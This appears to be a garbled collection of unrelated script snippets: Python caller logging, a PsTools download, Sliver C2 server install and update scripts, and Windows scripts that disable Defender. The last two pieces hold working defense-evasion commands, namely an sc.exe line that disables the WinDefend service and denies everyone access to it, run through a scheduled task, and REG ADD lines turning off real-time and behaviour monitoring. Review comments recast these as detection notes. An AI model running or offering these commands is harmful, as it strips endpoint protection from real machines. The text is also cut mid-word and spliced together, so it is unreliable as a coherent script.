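# Log where the current function was called from (debug level only).
# inspect.stack() builds a record for every frame on the call stack, so the
# caller's record is fetched once and reused instead of walking the stack
# three times; this also guarantees all three values describe the same frame.
caller = inspect.stack()[1]
caller_name = caller.function
file_name = caller.filename
line_number = caller.lineno
# NOTE(review): file_name is the caller's source path as Python recorded it;
# treat the debug log as internal if local paths should not be disclosed.
self.logger.debug(f"Called from function: {caller_name} in file {file_name} at line {line_number}")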
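# Download Sysinternals PsTools into C:\PS and check the binaries before use.

# Create PS folder on C: drive (-Force makes this a no-op when it already exists)
# NOTE(review): folders created directly under C:\ typically inherit write access
# for non-admin users; tighten the ACL if these tools will be run elevated.
New-Item -ItemType Directory -Force -Path "C:\PS"
# Set the TLS version for the download (it will error otherwise on hosts that
# do not default to TLS 1.2). Only TLS 1.2 is enabled: TLS 1.0 and 1.1 are
# deprecated and should not be offered as fallbacks.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# Download PsTools
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/PSTools.zip" -OutFile "C:\PS\PSTools.zip"
# Extract PsTools to the PS folder (-Force overwrites files left by an earlier run)
Expand-Archive -Path "C:\PS\PSTools.zip" -DestinationPath "C:\PS" -Force
# The archive is fetched without a pinned hash, so check the Authenticode
# signature of every executable in the folder and warn on anything not valid.
Get-ChildItem -Path "C:\PS" -Filter "*.exe" | ForEach-Object {
    $sig = Get-AuthenticodeSignature -FilePath $_.FullName
    if ($sig.Status -ne 'Valid') {
        Write-Warning "Signature check failed for $($_.Name): $($sig.Status)"
    }
}
# Auto Accept EULA, can also run psexec with -accepteula
#reg ADD HKCU\Software\Sysinternals\PSexec /v EulaAccepted /t REG_DWORD /d 1 /f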
Some golden links when you are having issues: https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity
Download and install Certi
[framework/core] | |
PROMPT=%whi[%T] %red(%L) %yel%J %grn%S%whi | |
TimestampOutput=true | |
ConsoleLogging=true | |
SessionLogging=true | |
[framework/features] | |
[framework/ui/console] |
#!/bin/bash | |
FILE=/etc/systemd/system/sliver-server.service | |
if [ ! -f "$FILE" ];then | |
sudo echo "[Unit] | |
Description=Sliver Server | |
[Service] | |
Type=simple | |
ExecStart=/usr/local/bin/sliver-server" > $FILE |
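#!/bin/bash
# Stop any running sliver-server service, clear out previously downloaded
# archives and binaries in the current directory, then fetch the latest
# Linux client and server release archives.

echo "Stopping sliver service (if it exists)"
# Best effort: the service may not be installed, so errors are discarded.
sudo service sliver-server stop 2>/dev/null

echo "Removing old files (if they exist)"
# rm -f succeeds when a file is missing. The previous guard tested a literal
# path named "file", so the cleanup never ran unless such a file existed.
rm -f -- sliver-client_linux.zip sliver-server_linux.zip
rm -f -- sliver-client sliver-server

echo "Downloading latest sliver linux releases"
# NOTE(review): "latest" is a moving target and nothing here verifies the
# archives. Check them against the signatures or checksums published with the
# release before unpacking or running anything.
wget -q "https://github.com/BishopFox/sliver/releases/latest/download/sliver-client_linux.zip" \
  || { echo "Download of sliver-client_linux.zip failed" >&2; exit 1; }
wget -q "https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux.zip" \
  || { echo "Download of sliver-server_linux.zip failed" >&2; exit 1; }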
# NOTE(review): security-control tampering; annotated for detection purposes.
# The command line sets the WinDefend service start type to disabled and then
# replaces the service's security descriptor with a DACL holding deny-GenericAll
# entries for Everyone (WD) and Owner Rights (OW).
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
# Scheduled-task action that runs the command line through cmd.exe.
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
# Task registration is observable: Security event 4698 (when task auditing is
# enabled) and the TaskScheduler operational log record the new task, and
# process command-line logging shows the sc.exe arguments when it runs.
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
# Connect to the Task Scheduler COM interface on the local machine.
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
# presumably the task is later run under this identity; the remainder of the
# script is not visible here, so confirm against the full file.
$user = 'NT SERVICE\TrustedInstaller' | |
# Root task folder, where 'TestTask' was registered above.
$folder = $svc.GetFolder('\') |
:: Turn Off Windows Defender
:: NOTE(review): each line below writes a policy value under
:: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender (needs an elevated prompt).
:: Writes to this key are a common tampering indicator: monitor registry-set
:: events on this path and the Defender operational log (5001 real-time
:: protection disabled, 5007 configuration changed). With Tamper Protection on,
:: current Windows builds are expected to ignore some of these values -
:: confirm on the target build.
:: Policy switch for the antispyware engine as a whole.
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
:: Stops automatic remediation of detected items.
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
:: Real-time protection: behavior monitoring off.
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
:: Real-time protection: real-time monitoring off.
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
:: Cloud-protection level